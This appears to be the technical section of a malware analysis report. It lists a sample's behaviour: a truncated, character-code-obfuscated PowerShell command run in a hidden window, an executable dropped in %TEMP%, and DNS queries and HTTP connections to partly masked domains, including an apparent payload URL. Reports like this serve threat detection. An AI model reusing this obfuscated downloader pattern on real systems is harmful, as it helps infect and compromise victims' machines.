Technical Information
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' [sTRing]::jOin('' ,(( 15, 81, 93,66,102 , 110 , 11 , 22, 11,69,78 , 92, 6,68 ,73, 65 , 78,72, 95, 11, 89 ,74 , 69 ,79,68 , 70, 16 ,15 ,68 ,79 ,123 , 120,106, 11 ,22 , 11,69 , 78 ,92, 6,68,73 ,6...
- %TEMP%\476731.exe
- %TEMP%\476731.exe
- 'za##do.com':80
- '11###a.com.cn':80
- 'an###gsi.com':80
- http://11###a.com.cn/pazjdY/
- http://www.11###a.com.cn/pazjdY/
- DNS ASK za##do.com
- DNS ASK 11###a.com.cn
- DNS ASK ea###bqd.com
- DNS ASK an###gsi.com
- DNS ASK va#####guzellik.com.tr
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' [sTRing]::jOin('' ,(( 15, 81, 93,66,102 , 110 , 11 , 22, 11,69,78 , 92, 6,68 ,73, 65 , 78,72, 95, 11, 89 ,74 , 69 ,79,68 , 70, 16 ,15 ,68 ,79 ,123 , 120,106, 11 ,22 , 11,69 , 78 ,92, 6,68,73 ,6...' (with hidden window)